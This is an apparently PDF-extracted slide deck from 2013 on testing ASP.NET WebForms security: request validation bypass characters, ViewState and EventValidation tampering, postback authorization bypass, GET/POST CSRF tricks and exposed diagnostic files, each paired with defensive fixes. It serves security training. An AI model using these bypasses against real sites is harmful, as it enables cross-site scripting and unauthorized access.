+ All Categories
Home > Documents > Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(•...

Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(•...

Date post: 23-Mar-2019
Category:
Upload: phungcong
View: 252 times
Download: 0 times
Share this document with a friend
29
Hacking ASP.Net: Tips and Tricks James Jardine [email protected] (866) 4047837 @JardineSoEware ©2013 Secure Ideas LLC | hOp://www.secureideas.com
Transcript
Page 1: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Hacking  ASP.Net:  Tips  and  Tricks  

James  Jardine    [email protected]  (866)  404-­‐7837  @JardineSoEware    ©2013  Secure  Ideas  LLC  |  hOp://www.secureideas.com  

Page 2: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

James  Jardine  

•  Principal  Security  Consultant  at  Secure  Ideas  •  .Net  Developer  Since  the  Beta  Release  •  SANS  Instructor  and  Author  

–  Dev544:  Secure  Coding  in  .Net  •  Open  Source  Projects  

–  Web  Config  Security  Analyzer  -­‐  hOp://sourceforge.net/projects/wcsa/  –  EventValMod - http://sourceforge.net/projects/eventvalmod  

•  Podcaster  –  Professionally  Evil  Perspec_ve  –  Down  the  Rabbit  Hole  

•  Blogs  –  .Net  Security  -­‐  hOp://www.jardinesoEware.net/  –  Gen.  Security  –  hOp://blog.secureideas.net  

2  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   2  

Page 3: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Topics  

•  ASP.Net  •  RequestValida_on  •  ViewState  •  EventValida_on  •  GET/POST  &  Postback  •  Conclusion  

3  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   3  

Page 4: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

ASP.Net  

4  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   4  

Versions    •  1.1  •  2.0  •  3.0  •  3.5  •  4.0  •  4.5  *    

Edi+ons    

•  WebForms  •  MVC  •  Web  Pages  •  Web  API  •  WCF  

Page 5: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Tes_ng  ASP.Net  

•  Similar  to  other  technologies  –  GETs/POSTs,  etc  –  AJAX  –  Cookies,  Hidden  Fields,  Forms  –  Session  State,  Authen_ca_on  

 

•  Differen_ators  –  Request  Valida_on  –  View  State  –  Event  Valida_on  –  Other  Built  In  Controls  

5  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   5  

Page 6: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Request  Valida_on  •  AOempt  to  block  XSS  AOacks  •  In  2.0+  only  works  for  HTML  Context  –  <[char],  <!,  <?,  </,  &#  

•  Prior  to  2.0  most  likely  disabled  

6  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   6  

Page 7: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Request  Valida_on  Bypass  •  Not  Really!  •  If  database  stores  data  as  varchar  (not  nvarchar)  •  Use  unicode-­‐wide    %uFF1C      (<)      •  RequestValida_on  doesn't  detect  this  but...  

•  Database  will  convert  it  to  the  <  character  

Of  course  output  encoding  does  block  this  as  well  

7  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   7  

Page 8: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Request  Valida_on  Bypass  2  •  Addi_on  of  %  Character  (<%tagname>)  •  Reported  to  work  in  IE  (I  was  unsuccessful)  •  Reported  by  Zamir  Pal_el  (hOp://www.securityfocus.com/

archive/1/524043)  

•  An  older  bypass  was  to  use  a  null  character    like        <%00tagname>  

•  Browser  specific  and  doesn't  really  work  anywhere  

Of  course  output  encoding  does  block  this  as  well  

8  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   8  

Page 9: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Request  Valida_on  Config  •  Set  in  the  Web.Config  File  

     <system.web>          <pages  validateRequest="true"  />        </system.web>  

•  Set  at  the  Page  Level  <%@  ValidateRequest="true"  %>  

9  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   9  

Page 10: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Yes,  It’s  Interes_ng  

10  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   10  

Page 11: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

ViewState  

•  Base64  Encoded  By  Default  –  Can  be  encrypted  

•  Vulnerabili_es  – Parameter  Tampering,  XSS,  Info  Leakage  

11  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   11  

Page 12: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

ViewState  Manipula_on  

•  ViewStateViewer  -­‐  hOp://labs.neohapsis.com/2009/08/03/viewstateviewer-­‐a-­‐gui-­‐tool-­‐for-­‐deserializingreserializing-­‐viewstate/    

12  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   12  

Page 13: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

ViewState  -­‐  Protected  

13  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   13  

Page 14: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

The  Problem  

14  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   14  

hOp://www.codeproject.com/Ques_ons/464873/Valida_on-­‐of-­‐viewstate-­‐MAC-­‐failed  

This  is  wrong  common  advice!!  

Page 15: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

ViewStateMac  

•  Provides  Tamper  Protec_on  for:  –  ViewState    –  EventValida_on        Web.Config  <pages  enableViewStateMac="true"/>    

Page  Level  <%@  Page  Language="C#"  EnableViewStateMac="true"...  

15  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   15  

Page 16: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Event  Valida_on  

•  Protects Drop Down Lists •  Protects against forged post backs •  Protected by ViewStateMac •  Creates an array of numeric hashes •  Not User Specific

–  Doesn't Protect against CSRF

<input type="hidden" name="__EVENTVALIDATION" value="/wEWBALslL0qAu3wv7QBAqnOkfQNAoznisYG"/>

16  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   16  

Page 17: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Event  Valida_on  -­‐  EventValMod  

•  Modifies the Event Validation field •  Stand Alone App / Written in .Net •  http://sourceforge.net/projects/eventvalmod

17  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   17  

Page 18: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Event  Valida_on  -­‐  VEHICLE  

•  ViewState Hidden Event Enumerator –  Formerly known as ria-scip

•  Works with ZAP •  Features

–  Event Execution of Disabled/Invisible Controls –  Server Control Property Injection –  Edit the ViewState Field –  Error-Based Control Name Enum –  ViewState/EventValidation Reconstruction

•  https://github.com/hacktics/vehicle

18  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   18  

Page 19: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

EventValida_on  Config  

•  Set  in  the  Web.Config  File      <system.web>        <pages  enableEventValida+on="true"  />      </system.web>  

•  Set  at  the  Page  Level  <%@  EnableEventValida+on="true"  %>  

19  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   19  

Page 20: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Bad,  Bad,  Bad!!  

20  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   20  

Page 21: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

ViewStateUserKey  •  Protects against Cross Site Request Forgery

–  Provides a user "salt" to ViewStateMac

•  Not enabled by default •  Only works for requests with ViewState

–  http://www.testsite.mm/deleteuser.aspx?id=5 (doesn't work)

•  Recommendation:

21  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   21  

Page 22: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Postback  

•  Webforms  are  based  around  "Postbacks"  •  Caused  by  Events  (ex.  buOon_click)  •  Triggered  by  __ViewState  or  __EventTarget  

   if  (!Page.IsPostback){        //  Authoriza_on/Populate  Data        lblCopy.Text  =  "copy  2013";        if(!User.IsInRole("Admin"))          Response.Redirect("Unauthorized.aspx");      }      else{        //  Execute  Events      }  

22  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   22  

Page 23: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Postback  AOacks  

•  Authoriza_on  Bypass      if(!User.IsInRole("Admin"))        Response.Redirect("Unauthorized.aspx");  

Recommenda_on:  –  Check  Authoriza_on  on  Every  Request  

•  XSS  (ViewState  Tampering)      lblCopy.Text  =  "copy  2013";  

Recommenda_on:  –  Enable  ViewStateMac  –  Set  text  on  every  request  

   

23  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   23  

Page 24: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

GET/POST  Exchange  

•  Server  Control  GETs  and  POSTs  are  Interchangeable  –  TextBox  –  ListBox  –  ViewState/EventValida_on  –  Etc.      

•  Based  on  Request  Type  •  Can  Call  POST  requests  with  GET  –  Good  for  CSRF  

•  Can  Trigger  Postback  with  GET  request  

24  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   24  

Page 25: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

GET/POST  Fix  

•  WebForms  if(Request.RequestType  ==  "POST")  

•  MVC  [HTTPPost]    void  DoSomething()  

25  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   25  

Page 26: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Authen_ca_on  Cookie  

•  HTTPOnly  (Hard  Coded)  •  Secure  Flag  may  not  be  set  –  Some_mes  there  is  an  error  if  behind  a  Load  Balancer  that  strips  SSL  

–  Should  Recommend  Manually  se�ng  this  value  •  Self-­‐Contained  –  Not  tracked  on  server  –  Timeout  is  key.    Lives  un_l  the  _meout  expires  on  the  cookie  

–  FormsAuthen_ca_on.Logout  only  removes  cookie  from  the  browser  (doesn’t  kill  it)  

26  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   26  

Page 27: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Misc.  Files  

•  Trace.axd  •  Elmah.axd  

•  Use  URL  Authoriza_on  in  the  Web.config  

•  Web.config  (crown  jewels)  –  GOOD  LUCK!!  –  IIS  is  set  up  to  not  serve  this  file  

27  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   27  

Page 28: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Conclusion  

•  ASP.Net  has  good  security  features  –  You  have  to  understand  them  

•  ViewStateMac  is  IMPORTANT!  –  EventValida_on  –  ViewState  –  ViewStateUserKey  

•  Developers  are  not  up  to  speed  on  these  things  –  Share  this  info  with  developers  

28  ©2013  Secure  Ideas  LLC  |  www.secureideas.com   28  

Page 29: Hacking(ASP.Net: Tips(and(Tricks( - sans.org · James(Jardine(• Principal(Security(ConsultantatSecure(Ideas(• .Net(Developer(Since(the(BetaRelease(• SANS(Instructor(and(Author

Hacking  ASP.Net:  Tips  and  Tricks  

James  Jardine      [email protected]  (866)  404-­‐7837  @JardineSoEware    ©2013  Secure  Ideas  LLC  |  hOp://www.secureideas.com  


Recommended